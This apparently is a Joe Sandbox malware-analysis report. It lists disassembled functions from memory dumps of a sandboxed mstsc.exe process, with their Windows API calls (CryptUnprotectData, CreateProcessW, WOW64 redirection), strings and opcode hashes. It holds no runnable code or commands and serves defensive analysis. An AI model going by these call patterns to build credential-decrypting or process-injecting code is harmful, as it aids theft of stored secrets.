                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0207011b0167ad1795be089b5048ef89fc41541891575aa8ad0b74d098844a7f
                                                                                                              • Instruction ID: 518e4b2efdbaea1bf7dcc0a4961e2c8198580a5f03bf3cf0f735d6d50f1b8762
                                                                                                              • Opcode Fuzzy Hash: 0207011b0167ad1795be089b5048ef89fc41541891575aa8ad0b74d098844a7f
                                                                                                              • Instruction Fuzzy Hash: A290023220544842F14071594444A460015CBD030AF55C055B0465695D9626DE56B661
                                                                                                              Function 04BB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 5 4bb2b60-4bb2b6c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: b21e8efad66c756346697c681541e03d122baecf83a2d84f4483872c5e41af1c
                                                                                                              • Instruction ID: 79b4d8a1e9b92757fbe39af7102d384820983f128f22a1296641ae45a1a50bc1
                                                                                                              • Opcode Fuzzy Hash: b21e8efad66c756346697c681541e03d122baecf83a2d84f4483872c5e41af1c
                                                                                                              • Instruction Fuzzy Hash: B590026220240003610571594454616400ACBE0206B55C065F1415591DC526D9926125
                                                                                                              Function 04BB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 4bb2c0a-4bb2c0f 1 4bb2c1f-4bb2c26 LdrInitializeThunk 0->1 2 4bb2c11-4bb2c18 0->2
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 6d036684a4274a699de0a5c3b2fc7c1eed2e75d9f355aa57121679de3d8dcbe3
                                                                                                              • Instruction ID: 138177fb78f1a7f15d5864caec9ab8e92f38ec1cdf0dc3e3e7436a0a700394d1
                                                                                                              • Opcode Fuzzy Hash: 6d036684a4274a699de0a5c3b2fc7c1eed2e75d9f355aa57121679de3d8dcbe3
                                                                                                              • Instruction Fuzzy Hash: 94B09B729015C5C5FB15F760460C7177A00EBD0706F15C0E5E2430642E4779D5D1E1B5

                                                                                                              Non-executed Functions

                                                                                                              Function 007A60E0 Relevance: 23.4, APIs: 7, Strings: 6, Instructions: 622windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 007A6181
                                                                                                              • SetCursor.USER32(00000000), ref: 007A6188
                                                                                                              • IsIconic.USER32(?), ref: 007A6538
                                                                                                                • Part of subcall function 007A0150: IsIconic.USER32(?), ref: 007A0196
                                                                                                                • Part of subcall function 007A0150: GetWindowPlacement.USER32(?,?), ref: 007A01A7
                                                                                                                • Part of subcall function 007A0150: GetLastError.KERNEL32 ref: 007A01B1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CursorIconic$ErrorLastLoadPlacementWindow
                                                                                                              • String ID: FALSE$SyncSessionDisplaySettings failed$TRUE$e$get_RemoteMonitorCount failed!$mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6
                                                                                                              • API String ID: 407897081-334542998
                                                                                                              • Opcode ID: 94af2566f4f3c6996e3c4825045e6860409ab8cbf8600919489b723132d35af7
                                                                                                              • Instruction ID: e764dc13c30fd646e0224355793ae9b38a1ea9be9273b9225b0acd5563653406
                                                                                                              • Opcode Fuzzy Hash: 94af2566f4f3c6996e3c4825045e6860409ab8cbf8600919489b723132d35af7
                                                                                                              • Instruction Fuzzy Hash: 0E22B671300201DFDF1D9F68C899A7A7A92BBCA304F18462DF542972A2DB3DDC51DB92
                                                                                                              Function 007E8051 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282memorycomCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,?,00000000), ref: 007E8080
                                                                                                              • GetLastError.KERNEL32 ref: 007E808A
                                                                                                              • wcsrchr.MSVCRT ref: 007E80F3
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 007E8199
                                                                                                              • SysAllocString.OLEAUT32(TCP), ref: 007E826F
                                                                                                              • CoCreateInstance.OLE32(0077983C,00000000,00000001,00782EF4,00000000), ref: 007E82CF
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 007E820C
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocModuleString$AddressCreateCurrentErrorFileFreeHandleInstanceLastLibraryMessageNameProcProcessTracewcsrchr
                                                                                                              • String ID: %s(%d)#RDPENC$Failed to create the map string$TCP
                                                                                                              • API String ID: 3585024546-1016363542
                                                                                                              • Opcode ID: 3cc1121a1938e28f75ff63262658ac795a6a6c73ffb6cc109348fef9ec409057
                                                                                                              • Instruction ID: 7e202baabf53ceb04148b9928d2185df6d49f560c9ef4d999efdfab239eeca49
                                                                                                              • Opcode Fuzzy Hash: 3cc1121a1938e28f75ff63262658ac795a6a6c73ffb6cc109348fef9ec409057
                                                                                                              • Instruction Fuzzy Hash: 30913532241350AFDB699F299C49F2A3B55BB08B20F280499F909DB1E2DE3CDC41CB56
                                                                                                              Function 007A0150 Relevance: 15.3, APIs: 10, Instructions: 332windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsIconic.USER32(?), ref: 007A0196
                                                                                                              • GetWindowPlacement.USER32(?,?), ref: 007A01A7
                                                                                                              • GetLastError.KERNEL32 ref: 007A01B1
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              • IsZoomed.USER32(?), ref: 007A02BA
                                                                                                              • SetWindowPlacement.USER32(?,?), ref: 007A02FE
                                                                                                              • GetLastError.KERNEL32 ref: 007A0308
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000216), ref: 007A0376
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000205), ref: 007A0461
                                                                                                              • GetClientRect.USER32(?,?), ref: 007A04F8
                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 007A0526
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ErrorLastPlacement$AddressClientFreeHandleIconicLibraryMessageModuleMoveProcRectTraceZoomed
                                                                                                              • String ID:
                                                                                                              • API String ID: 1784869082-0
                                                                                                              • Opcode ID: f6f08e4f9362c72626c74289280da7dd8bd46c17568d210b56ae0215b5077d08
                                                                                                              • Instruction ID: ae35df9b593accd85cc7a3ce24edcc6abf3282e66983b89b2d984c217870de1e
                                                                                                              • Opcode Fuzzy Hash: f6f08e4f9362c72626c74289280da7dd8bd46c17568d210b56ae0215b5077d08
                                                                                                              • Instruction Fuzzy Hash: 6CC1BF31A00204DFDF18DFA4DC89F6E7B66FF8A310F244569E9059B2A2DB79D851CB90
                                                                                                              Function 0087B05F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(comctl32.dll,?,00000000,?,?,007A590A,000003EC,00003ABF,00003AB5,00003ABE,00001000,00000009,00000001,0000FFFD,?,?), ref: 0087B0AB
                                                                                                              • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 0087B0C1
                                                                                                              • memset.MSVCRT ref: 0087B0DC
                                                                                                                • Part of subcall function 00883E7C: EventActivityIdControl.ADVAPI32(00000001,00000000,00000000,00000000,0088B068,?), ref: 00883E9E
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,007A590A,000003EC,00003ABF,00003AB5,00003ABE,00001000,00000009,00000001,0000FFFD,?,?), ref: 0087B2FC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$ActivityAddressControlEventFreeLoadProcmemset
                                                                                                              • String ID: TaskDialogIndirect$`$comctl32.dll
                                                                                                              • API String ID: 2217097755-1596583696
                                                                                                              • Opcode ID: a3a399870869b79640db68388b407412cb8ff01dd1070db55e88ba6dec509d7e
                                                                                                              • Instruction ID: a6c92ecb30f46a8bfb7ffa7c213af23e23a792bef7e5df91545d00fc2135ac67
                                                                                                              • Opcode Fuzzy Hash: a3a399870869b79640db68388b407412cb8ff01dd1070db55e88ba6dec509d7e
                                                                                                              • Instruction Fuzzy Hash: C8718E71A002589FDB24DF68CC94BDA77A6FB08304F1080EAE94CE7295D774DA848F61
                                                                                                              Function 00801187 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryencryptionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(Z:},00000000,00000000,00000000,00000000,00000001,?), ref: 008011CC
                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 008011EF
                                                                                                              • memcpy.MSVCRT(00000000,?,?), ref: 00801209
                                                                                                              • LocalFree.KERNEL32(?,00000000,?,?,007D3A5A), ref: 00801239
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                                              • String ID: Z:}
                                                                                                              • API String ID: 3243516280-2507645324
                                                                                                              • Opcode ID: 20647d4ac7a0781f15122a34c15260d577e6ca1fd7562b013e766039405ce1f0
                                                                                                              • Instruction ID: 0331ee4905418bec28d20d8746f524ce7673735c60f6314ed74c3f106e994cbe
                                                                                                              • Opcode Fuzzy Hash: 20647d4ac7a0781f15122a34c15260d577e6ca1fd7562b013e766039405ce1f0
                                                                                                              • Instruction Fuzzy Hash: 0321A175E00219AFDF60DFA99C89EAFBBB9FF94760B15406DE815E7280E7308D009B50
                                                                                                              Function 008010C5 Relevance: 6.1, APIs: 4, Instructions: 82memoryencryptionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CryptProtectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,007BB9AF), ref: 0080112E
                                                                                                              • LocalAlloc.KERNEL32(00000040,007BB9AF,?,0080102A,007BB9AF,00000000,?,00000200,?,?,007BB9AF), ref: 0080113E
                                                                                                              • memcpy.MSVCRT(00000000,00000000,007BB9AF,?,0080102A,007BB9AF,00000000,?,00000200,?,?,007BB9AF), ref: 00801157
                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000200,?,0080102A,007BB9AF), ref: 00801178
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Local$AllocCryptDataFreeProtectmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2336595795-0
                                                                                                              • Opcode ID: 63776777e31158e989fe8587312ce8453eb558690e8cc90e4461507caa43cc35
                                                                                                              • Instruction ID: 4ddb7d73bc2c6c2c66b1f984c5e62bfaf511e15400e1e6b37d226bfedb3dcc9f
                                                                                                              • Opcode Fuzzy Hash: 63776777e31158e989fe8587312ce8453eb558690e8cc90e4461507caa43cc35
                                                                                                              • Instruction Fuzzy Hash: 67218371E0021AABCF199F98DC49AAFBBB9FF04720F144069EA15E7390D7309D40CB90
                                                                                                              Function 007A00AA Relevance: 4.6, APIs: 3, Instructions: 60windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsIconic.USER32(?), ref: 007A00C3
                                                                                                              • GetWindowPlacement.USER32(?,?), ref: 007A00DA
                                                                                                              • GetLastError.KERNEL32 ref: 007A00E4
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressErrorFreeHandleIconicLastLibraryMessageModulePlacementProcTraceWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3754642993-0
                                                                                                              • Opcode ID: a245fb38cb433edf37936fb68a660b7a12d6cfab8b5cb184f152b4128ea2ce51
                                                                                                              • Instruction ID: 2d780797f7a156b1460263acc4b1cbb979ce5a6ac1bc2773af0d424756994942
                                                                                                              • Opcode Fuzzy Hash: a245fb38cb433edf37936fb68a660b7a12d6cfab8b5cb184f152b4128ea2ce51
                                                                                                              • Instruction Fuzzy Hash: 751198B1200208EFEB19AF69DC49FAA7766FF85314F100519F505971A1EB79D815C781
                                                                                                              Function 007F80BE Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSystemInfo.KERNEL32(?,00000000,?,?,?,007F84D8,00000000,007F8B1A,000000E8,00000000,00000000), ref: 007F80D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 31276548-0
                                                                                                              • Opcode ID: ca55281e29d7f62ee24260fe8dbe8ff7204b8de81448638f0f081d60b161c346
                                                                                                              • Instruction ID: 77806752698b9e2fbca66211520a27ca638da7c5e13e793902ff7fde77f5681f
                                                                                                              • Opcode Fuzzy Hash: ca55281e29d7f62ee24260fe8dbe8ff7204b8de81448638f0f081d60b161c346
                                                                                                              • Instruction Fuzzy Hash: 03E0ECB29043159FC754DF79890998BBBE8EB4C215711893AD49AE3200E6B0E940CB90
                                                                                                              Function 0079C170 Relevance: 27.3, APIs: 18, Instructions: 261filememoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _wcsicmp.MSVCRT ref: 0079C1AB
                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C1F8
                                                                                                              • GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C207
                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?), ref: 0079C278
                                                                                                              • GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C287
                                                                                                              • GetFileSize.KERNEL32(00000003,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C2DB
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C2E8
                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C2FD
                                                                                                              • CloseHandle.KERNEL32(00000080,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C34B
                                                                                                              • CloseHandle.KERNEL32(00000003,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C35B
                                                                                                              • LocalFree.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C366
                                                                                                              • LocalFree.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C371
                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C388
                                                                                                              • ReadFile.KERNEL32(80000000,00000000,00000000,80000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C3D5
                                                                                                              • GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C3DF
                                                                                                              • ReadFile.KERNEL32(?,00000000,80000000,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C440
                                                                                                              • GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C44A
                                                                                                              • memcmp.MSVCRT(00000080,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C4AB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$ErrorLastLocal$AllocCloseCreateFreeHandleReadSize$_wcsicmpmemcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 100733876-0
                                                                                                              • Opcode ID: 8e8012968d3f3c96bf156f25d53165c7ee16f95b57cd703289ba2451fd0a91ee
                                                                                                              • Instruction ID: b5caabbee84ad6d901aeef35d43b02ed8115244f15fd44fde907341336c91029
                                                                                                              • Opcode Fuzzy Hash: 8e8012968d3f3c96bf156f25d53165c7ee16f95b57cd703289ba2451fd0a91ee
                                                                                                              • Instruction Fuzzy Hash: 8291AF71104300AFDF1A9F68EC89F2A7BAAFF49324F244459F5818B2E2D739D941DB52
                                                                                                              Function 007D2094 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 187windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 007D20BF
                                                                                                              • memset.MSVCRT ref: 007D20D4
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000100), ref: 007D20E9
                                                                                                              • memset.MSVCRT ref: 007D2154
                                                                                                              • EnumDisplayDevicesW.USER32 ref: 007D22DB
                                                                                                              • ShellMessageBoxW.SHLWAPI ref: 007D2300
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00798086: TraceMessage.ADVAPI32(00000000,0079A670,0000002B,007810E8,0000000D,007D433C,00000004,00000000,?,007D433C,0079A670,00000000,00000000), ref: 0079809D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$HandleMessageModule$AddressDevicesDisplayEnumFreeLibraryProcShellTrace
                                                                                                              • String ID: %d x %d; $%d: $(%d, %d, %d, %d)
                                                                                                              • API String ID: 4237624060-4066068297
                                                                                                              • Opcode ID: 6b981c36af7a53c8d4de7115d4656a10483703c0febe30d74a4cf8248e00cdc9
                                                                                                              • Instruction ID: 818ded52b1a6f960acc54dad25bdde9c600cad06714e2d94268d95fce06802af
                                                                                                              • Opcode Fuzzy Hash: 6b981c36af7a53c8d4de7115d4656a10483703c0febe30d74a4cf8248e00cdc9
                                                                                                              • Instruction Fuzzy Hash: B0519671900218AADB24EBA4DD4DFEB777CFB95700F4401D5B548E2181E778AE85CB71
                                                                                                              Function 007DA0C8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 184libraryloaderprocessCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,00000104,00000000,00000000), ref: 007DA0E0
                                                                                                              • GetLastError.KERNEL32 ref: 007DA0EC
                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007DA14E
                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007DA15F
                                                                                                              • memset.MSVCRT ref: 007DA181
                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 007DA1C5
                                                                                                              • GetLastError.KERNEL32 ref: 007DA1CF
                                                                                                              • CloseHandle.KERNEL32(?), ref: 007DA222
                                                                                                              • CloseHandle.KERNEL32(?), ref: 007DA22B
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 007DA2EF
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00798086: TraceMessage.ADVAPI32(00000000,0079A670,0000002B,007810E8,0000000D,007D433C,00000004,00000000,?,007D433C,0079A670,00000000,00000000), ref: 0079809D
                                                                                                              Strings
                                                                                                              • Wow64DisableWow64FsRedirection, xrefs: 007DA148
                                                                                                              • Wow64RevertWow64FsRedirection, xrefs: 007DA154
                                                                                                              • kernel32.dll, xrefs: 007DA0D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
